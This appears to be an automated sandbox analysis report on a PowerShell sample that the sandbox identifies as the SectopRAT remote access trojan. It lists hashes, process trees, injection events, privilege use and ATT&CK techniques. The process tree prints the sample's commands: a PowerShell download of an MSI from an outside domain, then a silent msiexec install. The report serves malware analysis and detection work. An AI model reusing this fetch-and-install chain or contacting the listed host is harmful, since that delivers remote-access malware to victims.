sectoprat | 673e0d68fb4bf7faa06edab316d1fbc9cad8b10237cde5f3020b7feb45383048

Analysis

max time kernel
137s
max time network
142s
platform
windows10-2004_x64
resource
win10v2004-20250314-en
resource tags

arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
submitted
02/04/2025, 22:44

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

code.ps1
Size

128B
MD5

d8fb7b85741db93be10e3ed1363e32e7
SHA1

2b464dce118e15d86c14a3e967acea2ac333f9c3
SHA256

673e0d68fb4bf7faa06edab316d1fbc9cad8b10237cde5f3020b7feb45383048
SHA512

9023651ed98a14a2b5c579f4a61270daa337548c93169963d65cf2d9d10f1e2560e8b32874fca357acabacd8554394f369c106b95cda4c3add539870da9638af

Score

10^/10

sectoprat discovery execution rat trojan

Malware Config

Signatures

SectopRAT
SectopRAT is a remote access trojan first seen in November 2019.
trojan rat sectoprat

SectopRAT payload 1 IoCs

resource	yara_rule
behavioral1/memory/820-1448-0x0000000000400000-0x00000000004D4000-memory.dmp	family_sectoprat

Sectoprat family
sectoprat

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 4760 created 3380	4760	CasPol.exe	55

Blocklisted process makes network request 2 IoCs

flow	pid	Process
7	4168	powershell.exe
17	4168	powershell.exe

Executes dropped EXE 2 IoCs

pid	Process
2472	vmnetdhcp.exe
820	CasPol.exe

Loads dropped DLL 5 IoCs

pid	Process
2004	MsiExec.exe
2004	MsiExec.exe
2004	MsiExec.exe
2004	MsiExec.exe
4760	CasPol.exe

Enumerates connected drives 3 TTPs 23 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 2472 set thread context of 4760	2472	vmnetdhcp.exe	109
PID 2472 set thread context of 5068	2472	vmnetdhcp.exe	111
PID 4760 set thread context of 820	4760	CasPol.exe	115

Drops file in Windows directory 12 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Installer\MSIE7F1.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIE86F.tmp	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIE999.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\e57e35b.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File created	C:\Windows\Installer\SourceHash{05E46191-7BCB-4049-A621-B435063F3BBD}	msiexec.exe
File created	C:\Windows\Installer\e57e35f.msi	msiexec.exe
File created	C:\Windows\Installer\e57e35b.msi	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIE55F.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIE754.tmp	msiexec.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2872	powershell.exe

System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CasPol.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	vmnetdhcp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	gpupdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CasPol.exe

Suspicious behavior: EnumeratesProcesses 19 IoCs

pid	Process
2872	powershell.exe
2872	powershell.exe
4168	powershell.exe
4168	powershell.exe
4288	msiexec.exe
4288	msiexec.exe
2472	vmnetdhcp.exe
2472	vmnetdhcp.exe
2472	vmnetdhcp.exe
2472	vmnetdhcp.exe
4760	CasPol.exe
4760	CasPol.exe
4760	CasPol.exe
4760	CasPol.exe
5068	gpupdate.exe
5068	gpupdate.exe
5068	gpupdate.exe
4760	CasPol.exe
4760	CasPol.exe

Suspicious behavior: MapViewOfSection 3 IoCs

pid	Process
2472	vmnetdhcp.exe
2472	vmnetdhcp.exe
2472	vmnetdhcp.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2872	powershell.exe
Token: SeDebugPrivilege	4168	powershell.exe
Token: SeShutdownPrivilege	1544	msiexec.exe
Token: SeIncreaseQuotaPrivilege	1544	msiexec.exe
Token: SeSecurityPrivilege	4288	msiexec.exe
Token: SeCreateTokenPrivilege	1544	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	1544	msiexec.exe
Token: SeLockMemoryPrivilege	1544	msiexec.exe
Token: SeIncreaseQuotaPrivilege	1544	msiexec.exe
Token: SeMachineAccountPrivilege	1544	msiexec.exe
Token: SeTcbPrivilege	1544	msiexec.exe
Token: SeSecurityPrivilege	1544	msiexec.exe
Token: SeTakeOwnershipPrivilege	1544	msiexec.exe
Token: SeLoadDriverPrivilege	1544	msiexec.exe
Token: SeSystemProfilePrivilege	1544	msiexec.exe
Token: SeSystemtimePrivilege	1544	msiexec.exe
Token: SeProfSingleProcessPrivilege	1544	msiexec.exe
Token: SeIncBasePriorityPrivilege	1544	msiexec.exe
Token: SeCreatePagefilePrivilege	1544	msiexec.exe
Token: SeCreatePermanentPrivilege	1544	msiexec.exe
Token: SeBackupPrivilege	1544	msiexec.exe
Token: SeRestorePrivilege	1544	msiexec.exe
Token: SeShutdownPrivilege	1544	msiexec.exe
Token: SeDebugPrivilege	1544	msiexec.exe
Token: SeAuditPrivilege	1544	msiexec.exe
Token: SeSystemEnvironmentPrivilege	1544	msiexec.exe
Token: SeChangeNotifyPrivilege	1544	msiexec.exe
Token: SeRemoteShutdownPrivilege	1544	msiexec.exe
Token: SeUndockPrivilege	1544	msiexec.exe
Token: SeSyncAgentPrivilege	1544	msiexec.exe
Token: SeEnableDelegationPrivilege	1544	msiexec.exe
Token: SeManageVolumePrivilege	1544	msiexec.exe
Token: SeImpersonatePrivilege	1544	msiexec.exe
Token: SeCreateGlobalPrivilege	1544	msiexec.exe
Token: SeRestorePrivilege	4288	msiexec.exe
Token: SeTakeOwnershipPrivilege	4288	msiexec.exe
Token: SeRestorePrivilege	4288	msiexec.exe
Token: SeTakeOwnershipPrivilege	4288	msiexec.exe
Token: SeRestorePrivilege	4288	msiexec.exe
Token: SeTakeOwnershipPrivilege	4288	msiexec.exe
Token: SeRestorePrivilege	4288	msiexec.exe
Token: SeTakeOwnershipPrivilege	4288	msiexec.exe
Token: SeRestorePrivilege	4288	msiexec.exe
Token: SeTakeOwnershipPrivilege	4288	msiexec.exe
Token: SeRestorePrivilege	4288	msiexec.exe
Token: SeTakeOwnershipPrivilege	4288	msiexec.exe
Token: SeRestorePrivilege	4288	msiexec.exe
Token: SeTakeOwnershipPrivilege	4288	msiexec.exe
Token: SeRestorePrivilege	4288	msiexec.exe
Token: SeTakeOwnershipPrivilege	4288	msiexec.exe
Token: SeRestorePrivilege	4288	msiexec.exe
Token: SeTakeOwnershipPrivilege	4288	msiexec.exe
Token: SeRestorePrivilege	4288	msiexec.exe
Token: SeTakeOwnershipPrivilege	4288	msiexec.exe
Token: SeRestorePrivilege	4288	msiexec.exe
Token: SeTakeOwnershipPrivilege	4288	msiexec.exe
Token: SeRestorePrivilege	4288	msiexec.exe
Token: SeTakeOwnershipPrivilege	4288	msiexec.exe
Token: SeRestorePrivilege	4288	msiexec.exe
Token: SeTakeOwnershipPrivilege	4288	msiexec.exe
Token: SeRestorePrivilege	4288	msiexec.exe
Token: SeTakeOwnershipPrivilege	4288	msiexec.exe
Token: SeRestorePrivilege	4288	msiexec.exe
Token: SeTakeOwnershipPrivilege	4288	msiexec.exe

Suspicious use of WriteProcessMemory 27 IoCs

description	pid	Process	procid_target
PID 2872 wrote to memory of 4168	2872	powershell.exe	87
PID 2872 wrote to memory of 4168	2872	powershell.exe	87
PID 2872 wrote to memory of 1544	2872	powershell.exe	104
PID 2872 wrote to memory of 1544	2872	powershell.exe	104
PID 4288 wrote to memory of 2004	4288	msiexec.exe	107
PID 4288 wrote to memory of 2004	4288	msiexec.exe	107
PID 4288 wrote to memory of 2004	4288	msiexec.exe	107
PID 4288 wrote to memory of 2472	4288	msiexec.exe	108
PID 4288 wrote to memory of 2472	4288	msiexec.exe	108
PID 4288 wrote to memory of 2472	4288	msiexec.exe	108
PID 2472 wrote to memory of 4760	2472	vmnetdhcp.exe	109
PID 2472 wrote to memory of 4760	2472	vmnetdhcp.exe	109
PID 2472 wrote to memory of 4760	2472	vmnetdhcp.exe	109
PID 2472 wrote to memory of 4760	2472	vmnetdhcp.exe	109
PID 2472 wrote to memory of 4760	2472	vmnetdhcp.exe	109
PID 2472 wrote to memory of 5068	2472	vmnetdhcp.exe	111
PID 2472 wrote to memory of 5068	2472	vmnetdhcp.exe	111
PID 2472 wrote to memory of 5068	2472	vmnetdhcp.exe	111
PID 2472 wrote to memory of 5068	2472	vmnetdhcp.exe	111
PID 4760 wrote to memory of 820	4760	CasPol.exe	115
PID 4760 wrote to memory of 820	4760	CasPol.exe	115
PID 4760 wrote to memory of 820	4760	CasPol.exe	115
PID 4760 wrote to memory of 820	4760	CasPol.exe	115
PID 4760 wrote to memory of 820	4760	CasPol.exe	115
PID 4760 wrote to memory of 820	4760	CasPol.exe	115
PID 4760 wrote to memory of 820	4760	CasPol.exe	115
PID 4760 wrote to memory of 820	4760	CasPol.exe	115

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3380
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\code.ps1
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2872
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c iwr https://mfktiaoaolfkfjzjk.com/plu -OutFile C:\Users\Public\7bc.msi
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4168
- - C:\Windows\system32\msiexec.exe
    "C:\Windows\system32\msiexec.exe" /i C:\Users\Public\7bc.msi /qn
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1544
- C:\Users\Admin\AppData\Local\Temp\31084\CasPol.exe
  "C:\Users\Admin\AppData\Local\Temp\31084\CasPol.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:820

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4288
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 4298310646C57AF54FBEFD6915C7BB45
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:2004
- C:\Users\Admin\AppData\Roaming\Cruse\vmnetdhcp.exe
  "C:\Users\Admin\AppData\Roaming\Cruse\vmnetdhcp.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of WriteProcessMemory
  PID:2472
- - C:\Users\Admin\AppData\Local\Temp\31084\CasPol.exe
    C:\Users\Admin\AppData\Local\Temp\31084\CasPol.exe
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Loads dropped DLL
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:4760
- - C:\Windows\SysWOW64\gpupdate.exe
    C:\Windows\SysWOW64\gpupdate.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:5068

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Config.Msi\e57e35e.rbs

Filesize
11KB

MD5
700b2d5cdfd705687e125a317f252c1c

SHA1
165bad01ac732314bdd8daf5d45ccfad0e294977

SHA256
0271df480b636d7128d44ea395b78de8b0ee2e7cd988a4d0a7b18b789c3ad959

SHA512
dd777c5b2ee4344735c76dddea816e64a557abcf7f253ebe5c37a4032d2c58cf5baf8a446821af603e90618309a1011c8b70bcc8c64f988bb60006151a8f3fa7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
53b052154f5bf90cec9c30e8c8a2c4ae

SHA1
ef4d136bf9e71e7db9d2442f45cfb2cd00a84ce8

SHA256
81b52e6f7aa4899827173ec107909ca5ccdd3e6e8d8190f15200115f3d097e91

SHA512
088dad2662cdaa1b120c8bbb25624748600f82b8ab849d9dd150d874af361f8e5b26a5e2615909e29a0941287f58b28fa9f23849a6eb9303655eb0ea14346cba

Download Submit
C:\Users\Admin\AppData\Local\Temp\31084\CasPol.exe

Filesize
99KB

MD5
f61fa5ce25f885a9b1f549055c9911ed

SHA1
aba1c035b06017b0b0bd1c712669646e4f3765ab

SHA256
57e9675902b443085e37ead57dfed97de6bb61321682bc93aff30f16b5ca5aeb

SHA512
02e3db343037294fd3b774f954c9a617a50715e6b89d7c409f3c7dc5a1cf5ed9418158c442e9e80111994da139a9a16db33ac68a833d6d115c4a41bdf75751ac

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_faa4n053.h5s.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\b2cfd27e

Filesize
2.9MB

MD5
1c016531f2b109e3c8e06895188c3c79

SHA1
0f56fc7890cadb94a1029474912dab7b146a7376

SHA256
3e4dd65697cca5eae6361ea44145249a0978c945529d45015e4ede084977b99c

SHA512
87dba3edec8951052b21230ce69c1d948d93268c86ed3d7e579d2c3341b9d03803ba8d76b5079f74590f41196eb15efebfb8530a0a646419500eef0cce83cc42

Download Submit
C:\Users\Admin\AppData\Local\Temp\b748733f

Filesize
2.7MB

MD5
9837db7cfdbc32f096d365936246ae29

SHA1
81aa4851bcaaa0f56286360735651066ed4a8f60

SHA256
791f1854d6058b5b27ee393ed0a4828a2e04a1813da9c9ec2ab77ecb0980919f

SHA512
dbf2220bf0c8b1ac894fd166c647f1e9cbe66af989e10cf47ae27670621ac92ef4449d520e911cc55f08c8d21f89e39d32e5ddcfe61013622a8721503cd603fa

Download Submit
C:\Users\Admin\AppData\Local\Temp\b748733f

Filesize
2.7MB

MD5
8b6418df4f08ab74044a83bfba52544f

SHA1
736ee2bc67fa64ba4b4c31cbe206300a30fb78c4

SHA256
8ed7f23a613a5f52cd987a95e5d8733d030cd5f5c91a5b59bc3f8a00738871a4

SHA512
b3deee27771cd22fdbff6d89f60578e9bc07c6f8640d2016fe142408f9ea65ddac3b3aeb8145d8ccc9f2fd8ed4cf11e46ad6a21a2895ea4a18b9d4380bcd4a12

Download Submit
C:\Users\Public\7bc.msi

Filesize
5.0MB

MD5
e58d905d9e1529e987c9a82a74ce29c9

SHA1
b305eef82dc620e836ada7b56de9e98b077bf118

SHA256
87f7e5081a34770f1277d101c4ae40126623195cbce621196bde10e46df704b1

SHA512
ff0d482d98676b1ffdfdb82ce7ba1327bde0d92deee583335ea5d93e7e8aa81aeae9b59753646fc4d12ee553e7254f654caffaee28d3756030912c7ce729ccfb

Download Submit
C:\Windows\Installer\MSIE55F.tmp

Filesize
386KB

MD5
72b1c6699ddc2baab105d32761285df2

SHA1
fc85e9fb190f205e6752624a5231515c4ee4e155

SHA256
bf7f6f7e527ab8617766bb7a21c21b2895b5275c0e808756c2aadcd66eff8a97

SHA512
cde1e754d8dfb2fa55db243517b5dd3d75b209ea6387ef2e4be6157875e536db2373f23434a9e66c119150301c7b7cdf97de5a5544d94c03247b4ae716cbc170

Download Submit
memory/820-1448-0x0000000000400000-0x00000000004D4000-memory.dmp

Filesize
848KB

Download
memory/820-1451-0x00000000056D0000-0x0000000005892000-memory.dmp

Filesize
1.8MB

Download
memory/820-1450-0x0000000005230000-0x0000000005280000-memory.dmp

Filesize
320KB

Download
memory/820-1449-0x00000000052A0000-0x0000000005332000-memory.dmp

Filesize
584KB

Download
memory/2472-82-0x00007FFDBAD70000-0x00007FFDBAF65000-memory.dmp

Filesize
2.0MB

Download
memory/2472-74-0x00000000005C0000-0x0000000000A84000-memory.dmp

Filesize
4.8MB

Download
memory/2472-86-0x0000000075350000-0x000000007539F000-memory.dmp

Filesize
316KB

Download
memory/2472-81-0x0000000075350000-0x000000007539F000-memory.dmp

Filesize
316KB

Download
memory/2872-0-0x00007FFD9CDE3000-0x00007FFD9CDE5000-memory.dmp

Filesize
8KB

Download
memory/2872-36-0x00007FFD9CDE0000-0x00007FFD9D8A1000-memory.dmp

Filesize
10.8MB

Download
memory/2872-25-0x00007FFD9CDE0000-0x00007FFD9D8A1000-memory.dmp

Filesize
10.8MB

Download
memory/2872-12-0x00007FFD9CDE0000-0x00007FFD9D8A1000-memory.dmp

Filesize
10.8MB

Download
memory/2872-11-0x00007FFD9CDE0000-0x00007FFD9D8A1000-memory.dmp

Filesize
10.8MB

Download
memory/2872-10-0x000001F4F9680000-0x000001F4F96A2000-memory.dmp

Filesize
136KB

Download
memory/4168-26-0x00007FFD9CDE0000-0x00007FFD9D8A1000-memory.dmp

Filesize
10.8MB

Download
memory/4168-27-0x00007FFD9CDE0000-0x00007FFD9D8A1000-memory.dmp

Filesize
10.8MB

Download
memory/4168-31-0x00007FFD9CDE0000-0x00007FFD9D8A1000-memory.dmp

Filesize
10.8MB

Download
memory/4168-24-0x00007FFD9CDE0000-0x00007FFD9D8A1000-memory.dmp

Filesize
10.8MB

Download
memory/4168-23-0x00007FFD9CDE0000-0x00007FFD9D8A1000-memory.dmp

Filesize
10.8MB

Download
memory/4168-22-0x00007FFD9CDE0000-0x00007FFD9D8A1000-memory.dmp

Filesize
10.8MB

Download
memory/4760-146-0x00000000067E0000-0x000000000694B000-memory.dmp

Filesize
1.4MB

Download
memory/4760-114-0x00000000067E0000-0x000000000694B000-memory.dmp

Filesize
1.4MB

Download
memory/4760-130-0x00000000067E0000-0x000000000694B000-memory.dmp

Filesize
1.4MB

Download
memory/4760-150-0x00000000067E0000-0x000000000694B000-memory.dmp

Filesize
1.4MB

Download
memory/4760-104-0x00000000067E0000-0x000000000694B000-memory.dmp

Filesize
1.4MB

Download
memory/4760-144-0x00000000067E0000-0x000000000694B000-memory.dmp

Filesize
1.4MB

Download
memory/4760-142-0x00000000067E0000-0x000000000694B000-memory.dmp

Filesize
1.4MB

Download
memory/4760-140-0x00000000067E0000-0x000000000694B000-memory.dmp

Filesize
1.4MB

Download
memory/4760-138-0x00000000067E0000-0x000000000694B000-memory.dmp

Filesize
1.4MB

Download
memory/4760-136-0x00000000067E0000-0x000000000694B000-memory.dmp

Filesize
1.4MB

Download
memory/4760-134-0x00000000067E0000-0x000000000694B000-memory.dmp

Filesize
1.4MB

Download
memory/4760-132-0x00000000067E0000-0x000000000694B000-memory.dmp

Filesize
1.4MB

Download
memory/4760-128-0x00000000067E0000-0x000000000694B000-memory.dmp

Filesize
1.4MB

Download
memory/4760-126-0x00000000067E0000-0x000000000694B000-memory.dmp

Filesize
1.4MB

Download
memory/4760-148-0x00000000067E0000-0x000000000694B000-memory.dmp

Filesize
1.4MB

Download
memory/4760-124-0x00000000067E0000-0x000000000694B000-memory.dmp

Filesize
1.4MB

Download
memory/4760-122-0x00000000067E0000-0x000000000694B000-memory.dmp

Filesize
1.4MB

Download
memory/4760-120-0x00000000067E0000-0x000000000694B000-memory.dmp

Filesize
1.4MB

Download
memory/4760-118-0x00000000067E0000-0x000000000694B000-memory.dmp

Filesize
1.4MB

Download
memory/4760-116-0x00000000067E0000-0x000000000694B000-memory.dmp

Filesize
1.4MB

Download
memory/4760-112-0x00000000067E0000-0x000000000694B000-memory.dmp

Filesize
1.4MB

Download
memory/4760-110-0x00000000067E0000-0x000000000694B000-memory.dmp

Filesize
1.4MB

Download
memory/4760-108-0x00000000067E0000-0x000000000694B000-memory.dmp

Filesize
1.4MB

Download
memory/4760-106-0x00000000067E0000-0x000000000694B000-memory.dmp

Filesize
1.4MB

Download
memory/4760-102-0x00000000067E0000-0x000000000694B000-memory.dmp

Filesize
1.4MB

Download
memory/4760-98-0x00000000067E0000-0x000000000694B000-memory.dmp

Filesize
1.4MB

Download
memory/4760-95-0x00000000067E0000-0x000000000694B000-memory.dmp

Filesize
1.4MB

Download
memory/4760-96-0x00000000067E0000-0x000000000694B000-memory.dmp

Filesize
1.4MB

Download
memory/4760-100-0x00000000067E0000-0x000000000694B000-memory.dmp

Filesize
1.4MB

Download
memory/4760-1436-0x0000000006BB0000-0x0000000006C78000-memory.dmp

Filesize
800KB

Download
memory/4760-1437-0x0000000006C80000-0x0000000006D46000-memory.dmp

Filesize
792KB

Download
memory/4760-1438-0x0000000006B20000-0x0000000006B6C000-memory.dmp

Filesize
304KB

Download
memory/4760-1439-0x0000000007670000-0x0000000007C14000-memory.dmp

Filesize
5.6MB

Download
memory/4760-1440-0x0000000006D90000-0x0000000006DE4000-memory.dmp

Filesize
336KB

Download
memory/4760-94-0x00000000067E0000-0x0000000006950000-memory.dmp

Filesize
1.4MB

Download
memory/4760-93-0x00000000060D0000-0x000000000626E000-memory.dmp

Filesize
1.6MB

Download
memory/4760-89-0x0000000000F00000-0x00000000010D3000-memory.dmp

Filesize
1.8MB

Download
memory/4760-87-0x0000000073B60000-0x0000000073DF1000-memory.dmp

Filesize
2.6MB

Download